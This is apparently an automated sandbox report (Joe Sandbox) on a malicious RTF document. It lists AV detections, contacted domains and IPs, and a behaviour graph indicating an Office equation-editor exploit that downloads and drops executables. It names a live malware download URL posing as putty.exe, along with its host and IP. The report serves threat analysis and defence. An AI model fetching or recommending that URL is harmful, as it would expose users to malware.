  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 412279 Sample: 7bYDInO.rtf Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 53 Antivirus detection for URL or domain 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Sigma detected: EQNEDT32.EXE connecting to internet 2->57 59 5 other signatures 2->59 7 EQNEDT32.EXE 12 2->7         started        12 iexplore.exe 11 44 2->12         started        14 WINWORD.EXE 291 25 2->14         started        16 vdsldr.exe 2->16         started        process3 dnsIp4 45 000000027.xyz 194.58.112.173, 49165, 80 AS-REGRU Russian Federation 7->45 35 C:\Users\user\AppData\Roaming\9697.exe, PE32 7->35 dropped 37 C:\Users\...\MediaCreationTool20H2[1].exe, PE32 7->37 dropped 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->65 18 9697.exe 28 7->18         started        47 statics-wcus.onestore.ms 12->47 49 statics-neu.onestore.ms 12->49 51 7 other IPs or domains 12->51 21 iexplore.exe 9 501 12->21         started        file5 signatures6 process7 dnsIp8 27 C:\$Windows.~WS\Sources\SetupHost.exe, PE32 18->27 dropped 29 C:\$Windows.~WS\Sources\wpx.dll, PE32 18->29 dropped 31 C:\$Windows.~WS\Sources\wdsutil.dll, PE32 18->31 dropped 33 16 other files (none is malicious) 18->33 dropped 24 SetupHost.exe 5 19 18->24         started        39 blob.bl6prdstr14a.store.core.windows.net 52.239.152.74, 443, 49311, 49312 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->39 41 dart.l.doubleclick.net 142.250.185.102, 443, 49355, 49356 GOOGLEUS United States 21->41 43 47 other IPs or domains 21->43 file9 process10 signatures11 61 Query firmware table information (likely to detect VMs) 24->61 63 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 24->63

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
7bYDInO.rtf21%VirustotalBrowse
7bYDInO.rtf32%MetadefenderBrowse
7bYDInO.rtf38%ReversingLabsDocument-RTF.Exploit.Minerva

Dropped Files

SourceDetectionScannerLabelLink
C:\$Windows.~WS\Sources\DU.dll0%ReversingLabs
C:\$Windows.~WS\Sources\DiagTrack.dll0%MetadefenderBrowse
C:\$Windows.~WS\Sources\DiagTrack.dll0%ReversingLabs
C:\$Windows.~WS\Sources\DiagTrackRunner.exe0%MetadefenderBrowse
C:\$Windows.~WS\Sources\DiagTrackRunner.exe0%ReversingLabs
C:\$Windows.~WS\Sources\Diager.dll0%ReversingLabs
C:\$Windows.~WS\Sources\MediaSetupUIMgr.dll0%ReversingLabs
C:\$Windows.~WS\Sources\SetupCore.dll0%ReversingLabs
C:\$Windows.~WS\Sources\SetupHost.exe0%MetadefenderBrowse
C:\$Windows.~WS\Sources\SetupHost.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://www.iis.fhg.de/audioPA0%URL Reputationsafe
http://www.iis.fhg.de/audioPA0%URL Reputationsafe
http://www.iis.fhg.de/audioPA0%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://treyresearch.net0%URL Reputationsafe
http://treyresearch.net0%URL Reputationsafe
http://treyresearch.net0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://computername/printers/printername/.printer0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
https://w3c.github.io/IntersectionObserver/#intersection-observer-entry0%Avira URL Cloudsafe
http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
https://w3c.github.io/IntersectionObserver/#intersection-observer-interface0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://000000027.xyz/putty.exe100%Avira URL Cloudmalware
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
https://w3c.github.io/IntersectionObserver/#calculate-intersection-rect-algo0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sni1gl.wpc.gammacdn.net
152.199.21.175
truefalse
    unknown
    dart.l.doubleclick.net
    142.250.185.102
    truefalse
      high
      pagead46.l.doubleclick.net
      172.217.168.66
      truefalse
        high
        microsoftwindows.112.2o7.net
        35.181.18.61
        truefalse
          high
          blob.bl6prdstr14a.store.core.windows.net
          52.239.152.74
          truefalse
            high
            microsoftmscompoc.tt.omtrdc.net
            34.252.156.174
            truefalse
              unknown
              cdn.digicertcdn.com
              104.18.10.39
              truefalse
                unknown
                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                52.210.171.182
                truefalse
                  high
                  c-ct-eu.contentsquare.net
                  34.251.174.164
                  truefalse
                    unknown
                    webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com
                    52.45.173.110
                    truefalse
                      high
                      000000027.xyz
                      194.58.112.173
                      truetrue
                        unknown
                        scontent.xx.fbcdn.net
                        185.60.216.19
                        truefalse
                          high
                          cdnjs.cloudflare.com
                          104.16.18.94
                          truefalse
                            high
                            cs1227.wpc.alphacdn.net
                            192.229.221.185
                            truefalse
                              unknown
                              liveperson.map.fastly.net
                              151.101.1.192
                              truefalse
                                unknown
                                atlas.c10r.facebook.com
                                185.60.216.6
                                truefalse
                                  high
                                  js.monitor.azure.com
                                  unknown
                                  unknownfalse
                                    high
                                    logincdn.msauth.net
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.xbox.com
                                      unknown
                                      unknownfalse
                                        high
                                        account.xbox.com
                                        unknown
                                        unknownfalse
                                          high
                                          c.clicktale.net
                                          unknown
                                          unknownfalse
                                            high
                                            statics-eas.onestore.ms
                                            unknown
                                            unknownfalse
                                              unknown
                                              assets.onestore.ms
                                              unknown
                                              unknownfalse
                                                unknown
                                                ajax.aspnetcdn.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  controllers.xbox.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    surfaceselfserviceoffertool.azurewebsites.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      cart.production.store-web.dynamics.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        statics-wcus.onestore.ms
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          publisher.liveperson.net
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            ing-district.clicktale.net
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              cdnssl.clicktale.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                assets.xbox.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  compass-ssl.xbox.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    assets.adobedtm.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      ad.doubleclick.net
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        adservice.google.ch
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          mscom.demdex.net
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            c.xbox.com
                                                                            unknown
                                                                            unknownfalse
                                                                              high
                                                                              connect.facebook.net
                                                                              unknown
                                                                              unknownfalse
                                                                                high
                                                                                mem.gfx.ms
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  statics-neu.onestore.ms
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    ad.atdmt.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      statics-eus.onestore.ms
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        support.content.office.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          login.microsoftonline.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            amp.azure.net
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              high
                                                                                              offertooldataprod.blob.core.windows.net
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                high

                                                                                                Contacted URLs

                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                http://000000027.xyz/putty.exetrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://www.xbox.com/en-US/false
                                                                                                  high

                                                                                                  URLs from Memory and Binaries

                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                  http://www.eci.org/eci/en/eciRGB.phpdescsmc-hero[1].jpg.8.drfalse
                                                                                                    high
                                                                                                    http://www.msnbc.com/news/ticker.txt9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://compass-ssl.xbox.com/assets/6c/31/6c31e508-ddd9-40bd-91d4-cc362b1b15bc.gif?n=Grounded_GLP-CicontentPop2[1].js.8.drfalse
                                                                                                        high
                                                                                                        https://github.com/w3c/IntersectionObserver/pull/205contentPop2[1].js.8.drfalse
                                                                                                          high
                                                                                                          https://compass-ssl.xbox.com/assets/7b/30/7b30e02e-472a-46a6-b0fe-76a971dcec19.gif?n=Grounded_GLP-CicontentPop2[1].js.8.drfalse
                                                                                                            high
                                                                                                            http://ocsp.entrust.net03SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.iis.fhg.de/audioPA9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://github.com/w3c/IntersectionObserver/issues/324contentPop2[1].js.8.drfalse
                                                                                                              high
                                                                                                              https://compass-ssl.xbox.com/assets/d1/c9/d1c92d75-ede2-4369-93eb-6ab04a12050f.mp4?n=333099_Small-TocontentPop2[1].js.8.drfalse
                                                                                                                high
                                                                                                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0SetupHost.exe, 00000005.00000002.3353871006.00000000005BC000.00000004.00000020.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://compass-ssl.xbox.com/assets/95/75/95759052-cc36-4137-8742-d5abbc0015db.mp4?n=333099_Large-TocontentPop2[1].js.8.drfalse
                                                                                                                  high
                                                                                                                  http://www.diginotar.nl/cps/pkioverheid0SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://treyresearch.net9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://compass-ssl.xbox.com/assets/55/7e/557e0080-24d9-4594-b39e-569d5ad673f8.mp4?n=Grounded_HP-FATcontentPop2[1].js.8.drfalse
                                                                                                                    high
                                                                                                                    https://compass-ssl.xbox.com/assets/b3/de/b3de4dd6-6ee2-462e-9105-459263f21861.mp4?n=Grounded_HP-FATcontentPop2[1].js.8.drfalse
                                                                                                                      high
                                                                                                                      http://www.eci.org/eci/en/eciRGB.phpsmc-hero[1].jpg.8.drfalse
                                                                                                                        high
                                                                                                                        http://www.icra.org/vocabulary/.9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://compass-ssl.xbox.com/assets/f9/9c/f99c3934-6bf4-4833-ab24-677fb83cb882.mp4?n=Grounded-HP-FATcontentPop2[1].js.8.drfalse
                                                                                                                          high
                                                                                                                          http://schema.org/ItemListcontentPop2[1].js.8.drfalse
                                                                                                                            high
                                                                                                                            https://compass-ssl.xbox.com/assets/61/27/6127707e-15f9-43b1-b2f4-67069007436f.mp4?n=333099_Large-TocontentPop2[1].js.8.drfalse
                                                                                                                              high
                                                                                                                              http://investor.msn.com/9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://computername/printers/printername/.printer9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                low
                                                                                                                                http://www.%s.comPA9697.exe, 00000004.00000002.3357212824.00000000034F0000.00000002.00000001.sdmp, vdsldr.exe, 00000006.00000002.2130138328.0000000001AD0000.00000002.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                low
                                                                                                                                https://w3c.github.io/IntersectionObserver/#intersection-observer-entrycontentPop2[1].js.8.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://compass-ssl.xbox.com/assets/ca/fa/cafaa794-a881-4e12-ab76-86a8b1e2174b.gif?n=Grounded_GLP-CicontentPop2[1].js.8.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.windows.com/pctv.9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://investor.msn.com9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://wellformedweb.org/CommentAPI/9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://w3c.github.io/IntersectionObserver/#intersection-observer-interfacecontentPop2[1].js.8.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://crl.entrust.net/server1.crl0SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://compass-ssl.xbox.com/assets/3a/41/3a4199da-4f90-4701-9804-37073bd8c2ee.mp4?n=Grounded_HP-FATcontentPop2[1].js.8.drfalse
                                                                                                                                          high
                                                                                                                                          https://compass-ssl.xbox.com/assets/34/73/347373fa-2a03-4843-bbe7-7ba715caf03f.mp4?n=333099_Small-TocontentPop2[1].js.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://compass-ssl.xbox.com/assets/47/f4/47f472b0-4876-40d9-bcd8-319ec81c6bf6.gif?n=Grounded_GLP-CicontentPop2[1].js.8.drfalse
                                                                                                                                              high
                                                                                                                                              http://windowsmedia.com/redir/services.asp?WMPFriendly=true9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.hotmail.com/oe9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC634e263982fb4aa0a4ce1c92868d163RC634e263982fb4aa0a4ce1c92868d1637-source.min[1].js.8.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://compass-ssl.xbox.com/assets/28/26/282607ec-d5e8-45e1-9c87-09eb3bb73d45.mp4?n=333099_Small-TocontentPop2[1].js.8.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://compass-ssl.xbox.com/assets/54/4b/544b1e21-13d1-4eb8-9743-f9a7e7278724.mp4?n=Grounded-HP-FATcontentPop2[1].js.8.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://compass-ssl.xbox.com/assets/2a/b6/2ab6377c-a97b-4f5d-bfa6-3e972a1e3c5e.jpg?n=Grounded_HP-FATcontentPop2[1].js.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.9697.exe, 00000004.00000002.3357212824.00000000034F0000.00000002.00000001.sdmp, vdsldr.exe, 00000006.00000002.2130138328.0000000001AD0000.00000002.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://compass-ssl.xbox.com/assets/db/5c/db5c1b59-2652-4210-81c9-73ff3b80802d.png?n=playbutton.pngcontentPop2[1].js.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://w3c.github.io/IntersectionObserver/#calculate-intersection-rect-algocontentPop2[1].js.8.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://github.com/w3c/IntersectionObserver/issues/211contentPop2[1].js.8.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://schema.org/ProductcontentPop2[1].js.8.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://compass-ssl.xbox.com/assets/88/54/88549de9-e881-40bf-b4ec-17f176b8b4cf.mp4?n=333099_Small-TocontentPop2[1].js.8.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://secure.comodo.com/CPS0SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpfalse
                                                                                                                                                                      high

                                                                                                                                                                      Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      142.250.185.102
                                                                                                                                                                      dart.l.doubleclick.netUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      104.16.18.94
                                                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                      185.60.216.6
                                                                                                                                                                      atlas.c10r.facebook.comIreland
                                                                                                                                                                      32934FACEBOOKUSfalse
                                                                                                                                                                      192.229.221.185
                                                                                                                                                                      cs1227.wpc.alphacdn.netUnited States
                                                                                                                                                                      15133EDGECASTUSfalse
                                                                                                                                                                      52.45.173.110
                                                                                                                                                                      webrecorder-prod-1682395302.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                      14618AMAZON-AESUSfalse
                                                                                                                                                                      152.199.21.175
                                                                                                                                                                      sni1gl.wpc.gammacdn.netUnited States
                                                                                                                                                                      15133EDGECASTUSfalse
                                                                                                                                                                      34.252.156.174
                                                                                                                                                                      microsoftmscompoc.tt.omtrdc.netUnited States
                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                      194.58.112.173
                                                                                                                                                                      000000027.xyzRussian Federation
                                                                                                                                                                      197695AS-REGRUtrue
                                                                                                                                                                      52.239.152.74
                                                                                                                                                                      blob.bl6prdstr14a.store.core.windows.netUnited States
                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                      151.101.1.192
                                                                                                                                                                      liveperson.map.fastly.netUnited States
                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                      172.217.168.66
                                                                                                                                                                      pagead46.l.doubleclick.netUnited States
                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                      34.251.174.164
                                                                                                                                                                      c-ct-eu.contentsquare.netUnited States
                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                      185.60.216.19
                                                                                                                                                                      scontent.xx.fbcdn.netIreland
                                                                                                                                                                      32934FACEBOOKUSfalse
                                                                                                                                                                      52.210.171.182
                                                                                                                                                                      dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                      16509AMAZON-02USfalse

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                      Analysis ID:412279
                                                                                                                                                                      Start date:12.05.2021
                                                                                                                                                                      Start time:15:14:58
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 21m 45s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Sample file name:7bYDInO.rtf
                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.expl.evad.winRTF@10/588@45/14
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                                                      HDC Information:Failed
                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found application associated with file extension: .rtf
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Found warning dialog
                                                                                                                                                                      • Click Ok
                                                                                                                                                                      • Found warning dialog
                                                                                                                                                                      • Click Ok
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer
                                                                                                                                                                      • Browsing link: https://go.microsoft.com/fwlink/?LinkId=521839
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/
                                                                                                                                                                      • Browsing link: https://support.microsoft.com/en-us/
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/microsoft-365?ocid=oo_support_mix_marvel_ups_support_smcuhfm365
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/microsoft-365/microsoft-office?ocid=oo_support_mix_marvel_ups_support_smcuhfoffice
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/en-us/windows?ocid=smc_marvel_ups_support_uhfwindows
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/surface
                                                                                                                                                                      • Browsing link: https://www.xbox.com/
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/en-us/store/b/sale?icid=TopNavDealsSale
                                                                                                                                                                      • Browsing link: https://go.microsoft.com/fwlink/?linkid=849747
                                                                                                                                                                      • Browsing link: https://www.microsoft.com/microsoft-365
                                                                                                                                                                      Warnings:
                                                                                                                                                                      Show All
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 88.221.62.148, 184.30.20.109, 51.104.136.2, 40.127.240.158, 184.30.20.112, 92.122.145.53, 92.122.213.160, 92.122.213.163, 92.122.213.194, 92.122.213.247, 184.30.20.21, 152.199.19.160, 13.107.246.45, 13.107.213.45, 13.107.253.60, 13.107.226.60, 23.37.44.90, 88.221.228.182, 13.107.13.80, 131.253.33.200, 13.107.22.200, 204.79.197.200, 13.107.21.200, 104.18.10.39, 104.18.11.39, 205.185.216.42, 205.185.216.10, 2.20.143.16, 2.20.142.209, 65.55.44.109, 40.126.31.135, 40.126.31.6, 40.126.31.4, 40.126.31.139, 40.126.31.8, 40.126.31.141, 40.126.31.1, 20.190.159.138, 40.126.31.137, 40.126.31.143, 20.190.159.132, 52.114.132.20, 152.199.19.161, 2.20.142.212, 2.20.142.204, 13.107.4.50, 184.30.24.112, 92.122.213.240, 184.30.25.170, 84.53.167.109, 184.30.21.171, 52.114.128.43, 92.122.213.195, 92.122.213.176, 92.122.213.193, 2.21.61.5, 184.30.20.234, 13.66.138.97, 92.122.144.209, 92.122.213.219, 92.122.213.200, 184.30.24.58, 52.142.114.2, 104.83.98.60, 142.250.185.162, 92.122.213.211, 52.236.25.6
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): assets.xbox.com.edgekey.net, aijscdn2.afd.azureedge.net, assets.onestore.ms.edgekey.net, www.xbox.com.akadns.net, afd.e-0001.dc-msedge.net, cn-assets.adobedtm.com.edgekey.net, i.s-microsoft.com.edgekey.net, publisher.livepersonk.akadns.net, graystore.c-0001.c-msedge.net, ev.support.microsoft.com.edgekey.net, a1945.g2.akamai.net, dlc-shim.trafficmanager.net, e3843.g.akamaiedge.net, download.microsoft.com.edgekey.net, nontlu.graystore.au-msedge.net, videoplayercdn.osi.office.net, statics-marketingsites-eus-ms-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, compass-ssl.xbox.com-c.edgekey.net, dual-a-0001.a-msedge.net, lgincdnvzeuno.ec.azureedge.net, assets.onestore.ms.akadns.net, statics.onestore.ms.edgekey.net, settingsfd-geo.trafficmanager.net, c-s.cms.ms.akadns.net, lgincdn.trafficmanager.net, c.bing.com, cdn.account.microsoft.com.akadns.net, c.s-microsoft.com-c.edgekey.net, part-0032.t-0009.fb-t-msedge.net, e9398.g.akamaiedge.net, dual.part-0032.t-0009.t-msedge.net, cs9.wpc.v0cdn.net, a1985.g2.akamai.net, skypedataprdcoleus00.cloudapp.net, support.microsoft.com, c-bing-com.a-0001.a-msedge.net, statics-storeexp-neu-ms-com.akamaized.net, i.s-microsoft.com, adservice.google.com, iecvlist.microsoft.com, e1822.dspb.akamaiedge.net, part-0017.t-0009.t-msedge.net, go.microsoft.com, prod-video-cms-rt-microsoft-com.akamaized.net, 160c1.wpc.azureedge.net, compass-ssl.xbox.com.nsatc.net, assets.xbox.com.akadns.net, cs22.wpc.v0cdn.net, ie9comview.vo.msecnd.net, mem.gfx.ms.edgekey.net, e3673.dscg.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, nontlu-fg-shim.trafficmanager.net, e1822.dspg.akamaiedge.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, browser.events.data.microsoft.com, c.s-microsoft.com, e7808.dscg.akamaiedge.net, waws-prod-mwh-031.cloudapp.net, go.microsoft.com.edgekey.net, a1963.g2.akamai.net, az725175.vo.msecnd.net, e13678.dspb.akamaiedge.net, query.prod.cms.rt.microsoft.com, wcpstatic.microsoft.com, dl.delivery.mp.microsoft.com, mwf-service.akamaized.net, e13678.dscb.akamaiedge.net, browser.events.data.trafficmanager.net, sw-prod-appgwpublicip-northeurope.northeurope.cloudapp.azure.com, e11290.dspg.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, query.prod.cms.rt.microsoft.com.edgekey.net, login.live.com, main.dl.ms.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, e11070.b.akamaiedge.net, e1822.g.akamaiedge.net, download.microsoft.com, a287.g2.akamai.net, a1778.g2.akamai.net, e1822.dscg.akamaiedge.net, 2-01-3cf7-000c.cdx.cedexis.net, e10583.dspg.akamaiedge.net, e-0001.dc-msedge.net, a1835.g2.akamai.net, account.xbox.com.akadns.net, c.xbox.com.nsatc.net, cacerts.digicert.com, www.tm.a.prd.aadg.akadns.net, r20swj13mr.microsoft.com, statics-marketingsites-wcus-ms-com.akamaized.net, videoplayercdn.osi.office.net.edgekey.net, 